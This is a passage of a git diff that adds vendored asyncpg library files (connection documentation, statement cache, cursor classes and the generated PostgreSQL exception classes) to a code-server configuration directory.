environment variable, + - on Unix, common directories used for PostgreSQL Unix-domain + sockets: ``"/run/postgresql"``, ``"/var/run/postgresl"``, + ``"/var/pgsql_socket"``, ``"/private/tmp"``, and ``"/tmp"``, + - ``"localhost"``. + + :param port: + Port number to connect to at the server host + (or Unix-domain socket file extension). If multiple host + addresses were specified, this parameter may specify a + sequence of port numbers of the same length as the host sequence, + or it may specify a single port number to be used for all host + addresses. + + If not specified, the value parsed from the *dsn* argument is used, + or the value of the ``PGPORT`` environment variable, or ``5432`` if + neither is specified. + + :param user: + The name of the database role used for authentication. + + If not specified, the value parsed from the *dsn* argument is used, + or the value of the ``PGUSER`` environment variable, or the + operating system name of the user running the application. + + :param database: + The name of the database to connect to. + + If not specified, the value parsed from the *dsn* argument is used, + or the value of the ``PGDATABASE`` environment variable, or the + computed value of the *user* argument. + + :param password: + Password to be used for authentication, if the server requires + one. If not specified, the value parsed from the *dsn* argument + is used, or the value of the ``PGPASSWORD`` environment variable. + Note that the use of the environment variable is discouraged as + other users and applications may be able to read it without needing + specific privileges. It is recommended to use *passfile* instead. + + Password may be either a string, or a callable that returns a string. + If a callable is provided, it will be called each time a new connection + is established. + + :param passfile: + The name of the file used to store passwords + (defaults to ``~/.pgpass``, or ``%APPDATA%\postgresql\pgpass.conf`` + on Windows). + + :param service: + The name of the postgres connection service stored in the postgres + connection service file. + + :param servicefile: + The location of the connnection service file used to store + connection parameters. + + :param loop: + An asyncio event loop instance. If ``None``, the default + event loop will be used. + + :param float timeout: + Connection timeout in seconds. + + :param int statement_cache_size: + The size of prepared statement LRU cache. Pass ``0`` to + disable the cache. + + :param int max_cached_statement_lifetime: + The maximum time in seconds a prepared statement will stay + in the cache. Pass ``0`` to allow statements be cached + indefinitely. + + :param int max_cacheable_statement_size: + The maximum size of a statement that can be cached (15KiB by + default). Pass ``0`` to allow all statements to be cached + regardless of their size. + + :param float command_timeout: + The default timeout for operations on this connection + (the default is ``None``: no timeout). + + :param ssl: + Pass ``True`` or an `ssl.SSLContext `_ instance to + require an SSL connection. If ``True``, a default SSL context + returned by `ssl.create_default_context() `_ + will be used. The value can also be one of the following strings: + + - ``'disable'`` - SSL is disabled (equivalent to ``False``) + - ``'prefer'`` - try SSL first, fallback to non-SSL connection + if SSL connection fails + - ``'allow'`` - try without SSL first, then retry with SSL if the first + attempt fails. + - ``'require'`` - only try an SSL connection. Certificate + verification errors are ignored + - ``'verify-ca'`` - only try an SSL connection, and verify + that the server certificate is issued by a trusted certificate + authority (CA) + - ``'verify-full'`` - only try an SSL connection, verify + that the server certificate is issued by a trusted CA and + that the requested server host name matches that in the + certificate. + + The default is ``'prefer'``: try an SSL connection and fallback to + non-SSL connection if that fails. + + .. note:: + + *ssl* is ignored for Unix domain socket communication. + + Example of programmatic SSL context configuration that is equivalent + to ``sslmode=verify-full&sslcert=..&sslkey=..&sslrootcert=..``: + + .. code-block:: pycon + + >>> import asyncpg + >>> import asyncio + >>> import ssl + >>> async def main(): + ... # Load CA bundle for server certificate verification, + ... # equivalent to sslrootcert= in DSN. + ... sslctx = ssl.create_default_context( + ... ssl.Purpose.SERVER_AUTH, + ... cafile="path/to/ca_bundle.pem") + ... # If True, equivalent to sslmode=verify-full, if False: + ... # sslmode=verify-ca. + ... sslctx.check_hostname = True + ... # Load client certificate and private key for client + ... # authentication, equivalent to sslcert= and sslkey= in + ... # DSN. + ... sslctx.load_cert_chain( + ... "path/to/client.cert", + ... keyfile="path/to/client.key", + ... ) + ... con = await asyncpg.connect(user='postgres', ssl=sslctx) + ... await con.close() + >>> asyncio.run(main()) + + Example of programmatic SSL context configuration that is equivalent + to ``sslmode=require`` (no server certificate or host verification): + + .. code-block:: pycon + + >>> import asyncpg + >>> import asyncio + >>> import ssl + >>> async def main(): + ... sslctx = ssl.create_default_context( + ... ssl.Purpose.SERVER_AUTH) + ... sslctx.check_hostname = False + ... sslctx.verify_mode = ssl.CERT_NONE + ... con = await asyncpg.connect(user='postgres', ssl=sslctx) + ... await con.close() + >>> asyncio.run(main()) + + :param bool direct_tls: + Pass ``True`` to skip PostgreSQL STARTTLS mode and perform a direct + SSL connection. Must be used alongside ``ssl`` param. + + :param dict server_settings: + An optional dict of server runtime parameters. Refer to + PostgreSQL documentation for + a `list of supported options `_. + + :param type connection_class: + Class of the returned connection object. Must be a subclass of + :class:`~asyncpg.connection.Connection`. + + :param type record_class: + If specified, the class to use for records returned by queries on + this connection object. Must be a subclass of + :class:`~asyncpg.Record`. + + :param SessionAttribute target_session_attrs: + If specified, check that the host has the correct attribute. + Can be one of: + + - ``"any"`` - the first successfully connected host + - ``"primary"`` - the host must NOT be in hot standby mode + - ``"standby"`` - the host must be in hot standby mode + - ``"read-write"`` - the host must allow writes + - ``"read-only"`` - the host most NOT allow writes + - ``"prefer-standby"`` - first try to find a standby host, but if + none of the listed hosts is a standby server, + return any of them. + + If not specified, the value parsed from the *dsn* argument is used, + or the value of the ``PGTARGETSESSIONATTRS`` environment variable, + or ``"any"`` if neither is specified. + + :param str krbsrvname: + Kerberos service name to use when authenticating with GSSAPI. This + must match the server configuration. Defaults to 'postgres'. + + :param str gsslib: + GSS library to use for GSSAPI/SSPI authentication. Can be 'gssapi' + or 'sspi'. Defaults to 'sspi' on Windows and 'gssapi' otherwise. + + :return: A :class:`~asyncpg.connection.Connection` instance. + + Example: + + .. code-block:: pycon + + >>> import asyncpg + >>> import asyncio + >>> async def run(): + ... con = await asyncpg.connect(user='postgres') + ... types = await con.fetch('SELECT * FROM pg_type') + ... print(types) + ... + >>> asyncio.run(run()) + [= 0 + self._max_size = new_size + self._maybe_cleanup() + + def get_max_lifetime(self): + return self._max_lifetime + + def set_max_lifetime(self, new_lifetime): + assert new_lifetime >= 0 + self._max_lifetime = new_lifetime + for entry in self._entries.values(): + # For every entry cancel the existing callback + # and setup a new one if necessary. + self._set_entry_timeout(entry) + + def get(self, query, *, promote=True): + if not self._max_size: + # The cache is disabled. + return + + entry = self._entries.get(query) # type: _StatementCacheEntry + if entry is None: + return + + if entry._statement.closed: + # Happens in unittests when we call `stmt._state.mark_closed()` + # manually or when a prepared statement closes itself on type + # cache error. + self._entries.pop(query) + self._clear_entry_callback(entry) + return + + if promote: + # `promote` is `False` when `get()` is called by `has()`. + self._entries.move_to_end(query, last=True) + + return entry._statement + + def has(self, query): + return self.get(query, promote=False) is not None + + def put(self, query, statement): + if not self._max_size: + # The cache is disabled. + return + + self._entries[query] = self._new_entry(query, statement) + + # Check if the cache is bigger than max_size and trim it + # if necessary. + self._maybe_cleanup() + + def iter_statements(self): + return (e._statement for e in self._entries.values()) + + def clear(self): + # Store entries for later. + entries = tuple(self._entries.values()) + + # Clear the entries dict. + self._entries.clear() + + # Make sure that we cancel all scheduled callbacks + # and call on_remove callback for each entry. + for entry in entries: + self._clear_entry_callback(entry) + self._on_remove(entry._statement) + + def _set_entry_timeout(self, entry): + # Clear the existing timeout. + self._clear_entry_callback(entry) + + # Set the new timeout if it's not 0. + if self._max_lifetime: + entry._cleanup_cb = self._loop.call_later( + self._max_lifetime, self._on_entry_expired, entry) + + def _new_entry(self, query, statement): + entry = _StatementCacheEntry(self, query, statement) + self._set_entry_timeout(entry) + return entry + + def _on_entry_expired(self, entry): + # `call_later` callback, called when an entry stayed longer + # than `self._max_lifetime`. + if self._entries.get(entry._query) is entry: + self._entries.pop(entry._query) + self._on_remove(entry._statement) + + def _clear_entry_callback(self, entry): + if entry._cleanup_cb is not None: + entry._cleanup_cb.cancel() + + def _maybe_cleanup(self): + # Delete cache entries until the size of the cache is `max_size`. + while len(self._entries) > self._max_size: + old_query, old_entry = self._entries.popitem(last=False) + self._clear_entry_callback(old_entry) + + # Let the connection know that the statement was removed + # from the cache. + self._on_remove(old_entry._statement) + + +class _Callback(typing.NamedTuple): + + cb: typing.Callable[..., None] + is_async: bool + + @classmethod + def from_callable(cls, cb: typing.Callable[..., None]) -> '_Callback': + if inspect.iscoroutinefunction(cb): + is_async = True + elif callable(cb): + is_async = False + else: + raise exceptions.InterfaceError( + 'expected a callable or an `async def` function,' + 'got {!r}'.format(cb) + ) + + return cls(cb, is_async) + + +class _Atomic: + __slots__ = ('_acquired',) + + def __init__(self): + self._acquired = 0 + + def __enter__(self): + if self._acquired: + raise exceptions.InterfaceError( + 'cannot perform operation: another operation is in progress') + self._acquired = 1 + + def __exit__(self, t, e, tb): + self._acquired = 0 + + +class _ConnectionProxy: + # Base class to enable `isinstance(Connection)` check. + __slots__ = () + + +LoggedQuery = collections.namedtuple( + 'LoggedQuery', + ['query', 'args', 'timeout', 'elapsed', 'exception', 'conn_addr', + 'conn_params']) +LoggedQuery.__doc__ = 'Log record of an executed query.' + + +ServerCapabilities = collections.namedtuple( + 'ServerCapabilities', + ['advisory_locks', 'notifications', 'plpgsql', 'sql_reset', + 'sql_close_all', 'sql_copy_from_where', 'jit']) +ServerCapabilities.__doc__ = 'PostgreSQL server capabilities.' + + +def _detect_server_capabilities(server_version, connection_settings): + if hasattr(connection_settings, 'padb_revision'): + # Amazon Redshift detected. + advisory_locks = False + notifications = False + plpgsql = False + sql_reset = True + sql_close_all = False + jit = False + sql_copy_from_where = False + elif hasattr(connection_settings, 'crdb_version'): + # CockroachDB detected. + advisory_locks = False + notifications = False + plpgsql = False + sql_reset = False + sql_close_all = False + jit = False + sql_copy_from_where = False + elif hasattr(connection_settings, 'crate_version'): + # CrateDB detected. + advisory_locks = False + notifications = False + plpgsql = False + sql_reset = False + sql_close_all = False + jit = False + sql_copy_from_where = False + else: + # Standard PostgreSQL server assumed. + advisory_locks = True + notifications = True + plpgsql = True + sql_reset = True + sql_close_all = True + jit = server_version >= (11, 0) + sql_copy_from_where = server_version.major >= 12 + + return ServerCapabilities( + advisory_locks=advisory_locks, + notifications=notifications, + plpgsql=plpgsql, + sql_reset=sql_reset, + sql_close_all=sql_close_all, + sql_copy_from_where=sql_copy_from_where, + jit=jit, + ) + + +def _extract_stack(limit=10): + """Replacement for traceback.extract_stack() that only does the + necessary work for asyncio debug mode. + """ + frame = sys._getframe().f_back + try: + stack = traceback.StackSummary.extract( + traceback.walk_stack(frame), lookup_lines=False) + finally: + del frame + + apg_path = asyncpg.__path__[0] + i = 0 + while i < len(stack) and stack[i][0].startswith(apg_path): + i += 1 + stack = stack[i:i + limit] + + stack.reverse() + return ''.join(traceback.format_list(stack)) + + +def _check_record_class(record_class): + if record_class is protocol.Record: + pass + elif ( + isinstance(record_class, type) + and issubclass(record_class, protocol.Record) + ): + if ( + record_class.__new__ is not protocol.Record.__new__ + or record_class.__init__ is not protocol.Record.__init__ + ): + raise exceptions.InterfaceError( + 'record_class must not redefine __new__ or __init__' + ) + else: + raise exceptions.InterfaceError( + 'record_class is expected to be a subclass of ' + 'asyncpg.Record, got {!r}'.format(record_class) + ) + + +def _weak_maybe_gc_stmt(weak_ref, stmt): + self = weak_ref() + if self is not None: + self._maybe_gc_stmt(stmt) + + +_uid = 0 diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/connresource.py b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/connresource.py new file mode 100755 index 0000000..3b0c1d3 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/connresource.py @@ -0,0 +1,44 @@ + +# Copyright (C) 2016-present the asyncpg authors and contributors +# +# +# This module is part of asyncpg and is released under +# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0 + + +import functools + +from . import exceptions + + +def guarded(meth): + """A decorator to add a sanity check to ConnectionResource methods.""" + + @functools.wraps(meth) + def _check(self, *args, **kwargs): + self._check_conn_validity(meth.__name__) + return meth(self, *args, **kwargs) + + return _check + + +class ConnectionResource: + __slots__ = ('_connection', '_con_release_ctr') + + def __init__(self, connection): + self._connection = connection + self._con_release_ctr = connection._pool_release_ctr + + def _check_conn_validity(self, meth_name): + con_release_ctr = self._connection._pool_release_ctr + if con_release_ctr != self._con_release_ctr: + raise exceptions.InterfaceError( + 'cannot call {}.{}(): ' + 'the underlying connection has been released back ' + 'to the pool'.format(self.__class__.__name__, meth_name)) + + if self._connection.is_closed(): + raise exceptions.InterfaceError( + 'cannot call {}.{}(): ' + 'the underlying connection is closed'.format( + self.__class__.__name__, meth_name)) diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/cursor.py b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/cursor.py new file mode 100755 index 0000000..b4abeed --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/cursor.py @@ -0,0 +1,323 @@ +# Copyright (C) 2016-present the asyncpg authors and contributors +# +# +# This module is part of asyncpg and is released under +# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0 + + +import collections + +from . import connresource +from . import exceptions + + +class CursorFactory(connresource.ConnectionResource): + """A cursor interface for the results of a query. + + A cursor interface can be used to initiate efficient traversal of the + results of a large query. + """ + + __slots__ = ( + '_state', + '_args', + '_prefetch', + '_query', + '_timeout', + '_record_class', + ) + + def __init__( + self, + connection, + query, + state, + args, + prefetch, + timeout, + record_class + ): + super().__init__(connection) + self._args = args + self._prefetch = prefetch + self._query = query + self._timeout = timeout + self._state = state + self._record_class = record_class + if state is not None: + state.attach() + + @connresource.guarded + def __aiter__(self): + prefetch = 50 if self._prefetch is None else self._prefetch + return CursorIterator( + self._connection, + self._query, + self._state, + self._args, + self._record_class, + prefetch, + self._timeout, + ) + + @connresource.guarded + def __await__(self): + if self._prefetch is not None: + raise exceptions.InterfaceError( + 'prefetch argument can only be specified for iterable cursor') + cursor = Cursor( + self._connection, + self._query, + self._state, + self._args, + self._record_class, + ) + return cursor._init(self._timeout).__await__() + + def __del__(self): + if self._state is not None: + self._state.detach() + self._connection._maybe_gc_stmt(self._state) + + +class BaseCursor(connresource.ConnectionResource): + + __slots__ = ( + '_state', + '_args', + '_portal_name', + '_exhausted', + '_query', + '_record_class', + ) + + def __init__(self, connection, query, state, args, record_class): + super().__init__(connection) + self._args = args + self._state = state + if state is not None: + state.attach() + self._portal_name = None + self._exhausted = False + self._query = query + self._record_class = record_class + + def _check_ready(self): + if self._state is None: + raise exceptions.InterfaceError( + 'cursor: no associated prepared statement') + + if self._state.closed: + raise exceptions.InterfaceError( + 'cursor: the prepared statement is closed') + + if not self._connection._top_xact: + raise exceptions.NoActiveSQLTransactionError( + 'cursor cannot be created outside of a transaction') + + async def _bind_exec(self, n, timeout): + self._check_ready() + + if self._portal_name: + raise exceptions.InterfaceError( + 'cursor already has an open portal') + + con = self._connection + protocol = con._protocol + + self._portal_name = con._get_unique_id('portal') + buffer, _, self._exhausted = await protocol.bind_execute( + self._state, self._args, self._portal_name, n, True, timeout) + return buffer + + async def _bind(self, timeout): + self._check_ready() + + if self._portal_name: + raise exceptions.InterfaceError( + 'cursor already has an open portal') + + con = self._connection + protocol = con._protocol + + self._portal_name = con._get_unique_id('portal') + buffer = await protocol.bind(self._state, self._args, + self._portal_name, + timeout) + return buffer + + async def _exec(self, n, timeout): + self._check_ready() + + if not self._portal_name: + raise exceptions.InterfaceError( + 'cursor does not have an open portal') + + protocol = self._connection._protocol + buffer, _, self._exhausted = await protocol.execute( + self._state, self._portal_name, n, True, timeout) + return buffer + + async def _close_portal(self, timeout): + self._check_ready() + + if not self._portal_name: + raise exceptions.InterfaceError( + 'cursor does not have an open portal') + + protocol = self._connection._protocol + await protocol.close_portal(self._portal_name, timeout) + self._portal_name = None + + def __repr__(self): + attrs = [] + if self._exhausted: + attrs.append('exhausted') + attrs.append('') # to separate from id + + if self.__class__.__module__.startswith('asyncpg.'): + mod = 'asyncpg' + else: + mod = self.__class__.__module__ + + return '<{}.{} "{!s:.30}" {}{:#x}>'.format( + mod, self.__class__.__name__, + self._state.query, + ' '.join(attrs), id(self)) + + def __del__(self): + if self._state is not None: + self._state.detach() + self._connection._maybe_gc_stmt(self._state) + + +class CursorIterator(BaseCursor): + + __slots__ = ('_buffer', '_prefetch', '_timeout') + + def __init__( + self, + connection, + query, + state, + args, + record_class, + prefetch, + timeout + ): + super().__init__(connection, query, state, args, record_class) + + if prefetch <= 0: + raise exceptions.InterfaceError( + 'prefetch argument must be greater than zero') + + self._buffer = collections.deque() + self._prefetch = prefetch + self._timeout = timeout + + @connresource.guarded + def __aiter__(self): + return self + + @connresource.guarded + async def __anext__(self): + if self._state is None: + self._state = await self._connection._get_statement( + self._query, + self._timeout, + named=True, + record_class=self._record_class, + ) + self._state.attach() + + if not self._portal_name and not self._exhausted: + buffer = await self._bind_exec(self._prefetch, self._timeout) + self._buffer.extend(buffer) + + if not self._buffer and not self._exhausted: + buffer = await self._exec(self._prefetch, self._timeout) + self._buffer.extend(buffer) + + if self._portal_name and self._exhausted: + await self._close_portal(self._timeout) + + if self._buffer: + return self._buffer.popleft() + + raise StopAsyncIteration + + +class Cursor(BaseCursor): + """An open *portal* into the results of a query.""" + + __slots__ = () + + async def _init(self, timeout): + if self._state is None: + self._state = await self._connection._get_statement( + self._query, + timeout, + named=True, + record_class=self._record_class, + ) + self._state.attach() + self._check_ready() + await self._bind(timeout) + return self + + @connresource.guarded + async def fetch(self, n, *, timeout=None): + r"""Return the next *n* rows as a list of :class:`Record` objects. + + :param float timeout: Optional timeout value in seconds. + + :return: A list of :class:`Record` instances. + """ + self._check_ready() + if n <= 0: + raise exceptions.InterfaceError('n must be greater than zero') + if self._exhausted: + return [] + recs = await self._exec(n, timeout) + if len(recs) < n: + self._exhausted = True + return recs + + @connresource.guarded + async def fetchrow(self, *, timeout=None): + r"""Return the next row. + + :param float timeout: Optional timeout value in seconds. + + :return: A :class:`Record` instance. + """ + self._check_ready() + if self._exhausted: + return None + recs = await self._exec(1, timeout) + if len(recs) < 1: + self._exhausted = True + return None + return recs[0] + + @connresource.guarded + async def forward(self, n, *, timeout=None) -> int: + r"""Skip over the next *n* rows. + + :param float timeout: Optional timeout value in seconds. + + :return: A number of rows actually skipped over (<= *n*). + """ + self._check_ready() + if n <= 0: + raise exceptions.InterfaceError('n must be greater than zero') + + protocol = self._connection._protocol + status = await protocol.query('MOVE FORWARD {:d} {}'.format( + n, self._portal_name), timeout) + + advanced = int(status.split()[1]) + if advanced < n: + self._exhausted = True + + return advanced diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/exceptions/__init__.py b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/exceptions/__init__.py new file mode 100755 index 0000000..752fd00 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/exceptions/__init__.py @@ -0,0 +1,1211 @@ +# GENERATED FROM postgresql/src/backend/utils/errcodes.txt +# DO NOT MODIFY, use tools/generate_exceptions.py to update + +from ._base import * # NOQA +from . import _base + + +class PostgresWarning(_base.PostgresLogMessage, Warning): + sqlstate = '01000' + + +class DynamicResultSetsReturned(PostgresWarning): + sqlstate = '0100C' + + +class ImplicitZeroBitPadding(PostgresWarning): + sqlstate = '01008' + + +class NullValueEliminatedInSetFunction(PostgresWarning): + sqlstate = '01003' + + +class PrivilegeNotGranted(PostgresWarning): + sqlstate = '01007' + + +class PrivilegeNotRevoked(PostgresWarning): + sqlstate = '01006' + + +class StringDataRightTruncation(PostgresWarning): + sqlstate = '01004' + + +class DeprecatedFeature(PostgresWarning): + sqlstate = '01P01' + + +class NoData(PostgresWarning): + sqlstate = '02000' + + +class NoAdditionalDynamicResultSetsReturned(NoData): + sqlstate = '02001' + + +class SQLStatementNotYetCompleteError(_base.PostgresError): + sqlstate = '03000' + + +class PostgresConnectionError(_base.PostgresError): + sqlstate = '08000' + + +class ConnectionDoesNotExistError(PostgresConnectionError): + sqlstate = '08003' + + +class ConnectionFailureError(PostgresConnectionError): + sqlstate = '08006' + + +class ClientCannotConnectError(PostgresConnectionError): + sqlstate = '08001' + + +class ConnectionRejectionError(PostgresConnectionError): + sqlstate = '08004' + + +class TransactionResolutionUnknownError(PostgresConnectionError): + sqlstate = '08007' + + +class ProtocolViolationError(PostgresConnectionError): + sqlstate = '08P01' + + +class TriggeredActionError(_base.PostgresError): + sqlstate = '09000' + + +class FeatureNotSupportedError(_base.PostgresError): + sqlstate = '0A000' + + +class InvalidCachedStatementError(FeatureNotSupportedError): + pass + + +class InvalidTransactionInitiationError(_base.PostgresError): + sqlstate = '0B000' + + +class LocatorError(_base.PostgresError): + sqlstate = '0F000' + + +class InvalidLocatorSpecificationError(LocatorError): + sqlstate = '0F001' + + +class InvalidGrantorError(_base.PostgresError): + sqlstate = '0L000' + + +class InvalidGrantOperationError(InvalidGrantorError): + sqlstate = '0LP01' + + +class InvalidRoleSpecificationError(_base.PostgresError): + sqlstate = '0P000' + + +class DiagnosticsError(_base.PostgresError): + sqlstate = '0Z000' + + +class StackedDiagnosticsAccessedWithoutActiveHandlerError(DiagnosticsError): + sqlstate = '0Z002' + + +class InvalidArgumentForXqueryError(_base.PostgresError): + sqlstate = '10608' + + +class CaseNotFoundError(_base.PostgresError): + sqlstate = '20000' + + +class CardinalityViolationError(_base.PostgresError): + sqlstate = '21000' + + +class DataError(_base.PostgresError): + sqlstate = '22000' + + +class ArraySubscriptError(DataError): + sqlstate = '2202E' + + +class CharacterNotInRepertoireError(DataError): + sqlstate = '22021' + + +class DatetimeFieldOverflowError(DataError): + sqlstate = '22008' + + +class DivisionByZeroError(DataError): + sqlstate = '22012' + + +class ErrorInAssignmentError(DataError): + sqlstate = '22005' + + +class EscapeCharacterConflictError(DataError): + sqlstate = '2200B' + + +class IndicatorOverflowError(DataError): + sqlstate = '22022' + + +class IntervalFieldOverflowError(DataError): + sqlstate = '22015' + + +class InvalidArgumentForLogarithmError(DataError): + sqlstate = '2201E' + + +class InvalidArgumentForNtileFunctionError(DataError): + sqlstate = '22014' + + +class InvalidArgumentForNthValueFunctionError(DataError): + sqlstate = '22016' + + +class InvalidArgumentForPowerFunctionError(DataError): + sqlstate = '2201F' + + +class InvalidArgumentForWidthBucketFunctionError(DataError): + sqlstate = '2201G' + + +class InvalidCharacterValueForCastError(DataError): + sqlstate = '22018' + + +class InvalidDatetimeFormatError(DataError): + sqlstate = '22007' + + +class InvalidEscapeCharacterError(DataError): + sqlstate = '22019' + + +class InvalidEscapeOctetError(DataError): + sqlstate = '2200D' + + +class InvalidEscapeSequenceError(DataError): + sqlstate = '22025' + + +class NonstandardUseOfEscapeCharacterError(DataError): + sqlstate = '22P06' + + +class InvalidIndicatorParameterValueError(DataError): + sqlstate = '22010' + + +class InvalidParameterValueError(DataError): + sqlstate = '22023' + + +class InvalidPrecedingOrFollowingSizeError(DataError): + sqlstate = '22013' + + +class InvalidRegularExpressionError(DataError): + sqlstate = '2201B' + + +class InvalidRowCountInLimitClauseError(DataError): + sqlstate = '2201W' + + +class InvalidRowCountInResultOffsetClauseError(DataError): + sqlstate = '2201X' + + +class InvalidTablesampleArgumentError(DataError): + sqlstate = '2202H' + + +class InvalidTablesampleRepeatError(DataError): + sqlstate = '2202G' + + +class InvalidTimeZoneDisplacementValueError(DataError): + sqlstate = '22009' + + +class InvalidUseOfEscapeCharacterError(DataError): + sqlstate = '2200C' + + +class MostSpecificTypeMismatchError(DataError): + sqlstate = '2200G' + + +class NullValueNotAllowedError(DataError): + sqlstate = '22004' + + +class NullValueNoIndicatorParameterError(DataError): + sqlstate = '22002' + + +class NumericValueOutOfRangeError(DataError): + sqlstate = '22003' + + +class SequenceGeneratorLimitExceededError(DataError): + sqlstate = '2200H' + + +class StringDataLengthMismatchError(DataError): + sqlstate = '22026' + + +class StringDataRightTruncationError(DataError): + sqlstate = '22001' + + +class SubstringError(DataError): + sqlstate = '22011' + + +class TrimError(DataError): + sqlstate = '22027' + + +class UnterminatedCStringError(DataError): + sqlstate = '22024' + + +class ZeroLengthCharacterStringError(DataError): + sqlstate = '2200F' + + +class PostgresFloatingPointError(DataError): + sqlstate = '22P01' + + +class InvalidTextRepresentationError(DataError): + sqlstate = '22P02' + + +class InvalidBinaryRepresentationError(DataError): + sqlstate = '22P03' + + +class BadCopyFileFormatError(DataError): + sqlstate = '22P04' + + +class UntranslatableCharacterError(DataError): + sqlstate = '22P05' + + +class NotAnXmlDocumentError(DataError): + sqlstate = '2200L' + + +class InvalidXmlDocumentError(DataError): + sqlstate = '2200M' + + +class InvalidXmlContentError(DataError): + sqlstate = '2200N' + + +class InvalidXmlCommentError(DataError): + sqlstate = '2200S' + + +class InvalidXmlProcessingInstructionError(DataError): + sqlstate = '2200T' + + +class DuplicateJsonObjectKeyValueError(DataError): + sqlstate = '22030' + + +class InvalidArgumentForSQLJsonDatetimeFunctionError(DataError): + sqlstate = '22031' + + +class InvalidJsonTextError(DataError): + sqlstate = '22032' + + +class InvalidSQLJsonSubscriptError(DataError): + sqlstate = '22033' + + +class MoreThanOneSQLJsonItemError(DataError): + sqlstate = '22034' + + +class NoSQLJsonItemError(DataError): + sqlstate = '22035' + + +class NonNumericSQLJsonItemError(DataError): + sqlstate = '22036' + + +class NonUniqueKeysInAJsonObjectError(DataError): + sqlstate = '22037' + + +class SingletonSQLJsonItemRequiredError(DataError): + sqlstate = '22038' + + +class SQLJsonArrayNotFoundError(DataError): + sqlstate = '22039' + + +class SQLJsonMemberNotFoundError(DataError): + sqlstate = '2203A' + + +class SQLJsonNumberNotFoundError(DataError): + sqlstate = '2203B' + + +class SQLJsonObjectNotFoundError(DataError): + sqlstate = '2203C' + + +class TooManyJsonArrayElementsError(DataError): + sqlstate = '2203D' + + +class TooManyJsonObjectMembersError(DataError): + sqlstate = '2203E' + + +class SQLJsonScalarRequiredError(DataError): + sqlstate = '2203F' + + +class SQLJsonItemCannotBeCastToTargetTypeError(DataError): + sqlstate = '2203G' + + +class IntegrityConstraintViolationError(_base.PostgresError): + sqlstate = '23000' + + +class RestrictViolationError(IntegrityConstraintViolationError): + sqlstate = '23001' + + +class NotNullViolationError(IntegrityConstraintViolationError): + sqlstate = '23502' + + +class ForeignKeyViolationError(IntegrityConstraintViolationError): + sqlstate = '23503' + + +class UniqueViolationError(IntegrityConstraintViolationError): + sqlstate = '23505' + + +class CheckViolationError(IntegrityConstraintViolationError): + sqlstate = '23514' + + +class ExclusionViolationError(IntegrityConstraintViolationError): + sqlstate = '23P01' + + +class InvalidCursorStateError(_base.PostgresError): + sqlstate = '24000' + + +class InvalidTransactionStateError(_base.PostgresError): + sqlstate = '25000' + + +class ActiveSQLTransactionError(InvalidTransactionStateError): + sqlstate = '25001' + + +class BranchTransactionAlreadyActiveError(InvalidTransactionStateError): + sqlstate = '25002' + + +class HeldCursorRequiresSameIsolationLevelError(InvalidTransactionStateError): + sqlstate = '25008' + + +class InappropriateAccessModeForBranchTransactionError( + InvalidTransactionStateError): + sqlstate = '25003' + + +class InappropriateIsolationLevelForBranchTransactionError( + InvalidTransactionStateError): + sqlstate = '25004' + + +class NoActiveSQLTransactionForBranchTransactionError( + InvalidTransactionStateError): + sqlstate = '25005' + + +class ReadOnlySQLTransactionError(InvalidTransactionStateError): + sqlstate = '25006' + + +class SchemaAndDataStatementMixingNotSupportedError( + InvalidTransactionStateError): + sqlstate = '25007' + + +class NoActiveSQLTransactionError(InvalidTransactionStateError): + sqlstate = '25P01' + + +class InFailedSQLTransactionError(InvalidTransactionStateError): + sqlstate = '25P02' + + +class IdleInTransactionSessionTimeoutError(InvalidTransactionStateError): + sqlstate = '25P03' + + +class TransactionTimeoutError(InvalidTransactionStateError): + sqlstate = '25P04' + + +class InvalidSQLStatementNameError(_base.PostgresError): + sqlstate = '26000' + + +class TriggeredDataChangeViolationError(_base.PostgresError): + sqlstate = '27000' + + +class InvalidAuthorizationSpecificationError(_base.PostgresError): + sqlstate = '28000' + + +class InvalidPasswordError(InvalidAuthorizationSpecificationError): + sqlstate = '28P01' + + +class DependentPrivilegeDescriptorsStillExistError(_base.PostgresError): + sqlstate = '2B000' + + +class DependentObjectsStillExistError( + DependentPrivilegeDescriptorsStillExistError): + sqlstate = '2BP01' + + +class InvalidTransactionTerminationError(_base.PostgresError): + sqlstate = '2D000' + + +class SQLRoutineError(_base.PostgresError): + sqlstate = '2F000' + + +class FunctionExecutedNoReturnStatementError(SQLRoutineError): + sqlstate = '2F005' + + +class ModifyingSQLDataNotPermittedError(SQLRoutineError): + sqlstate = '2F002' + + +class ProhibitedSQLStatementAttemptedError(SQLRoutineError): + sqlstate = '2F003' + + +class ReadingSQLDataNotPermittedError(SQLRoutineError): + sqlstate = '2F004' + + +class InvalidCursorNameError(_base.PostgresError): + sqlstate = '34000' + + +class ExternalRoutineError(_base.PostgresError): + sqlstate = '38000' + + +class ContainingSQLNotPermittedError(ExternalRoutineError): + sqlstate = '38001' + + +class ModifyingExternalRoutineSQLDataNotPermittedError(ExternalRoutineError): + sqlstate = '38002' + + +class ProhibitedExternalRoutineSQLStatementAttemptedError( + ExternalRoutineError): + sqlstate = '38003' + + +class ReadingExternalRoutineSQLDataNotPermittedError(ExternalRoutineError): + sqlstate = '38004' + + +class ExternalRoutineInvocationError(_base.PostgresError): + sqlstate = '39000' + + +class InvalidSqlstateReturnedError(ExternalRoutineInvocationError): + sqlstate = '39001' + + +class NullValueInExternalRoutineNotAllowedError( + ExternalRoutineInvocationError): + sqlstate = '39004' + + +class TriggerProtocolViolatedError(ExternalRoutineInvocationError): + sqlstate = '39P01' + + +class SrfProtocolViolatedError(ExternalRoutineInvocationError): + sqlstate = '39P02' + + +class EventTriggerProtocolViolatedError(ExternalRoutineInvocationError): + sqlstate = '39P03' + + +class SavepointError(_base.PostgresError): + sqlstate = '3B000' + + +class InvalidSavepointSpecificationError(SavepointError): + sqlstate = '3B001' + + +class InvalidCatalogNameError(_base.PostgresError): + sqlstate = '3D000' + + +class InvalidSchemaNameError(_base.PostgresError): + sqlstate = '3F000' + + +class TransactionRollbackError(_base.PostgresError): + 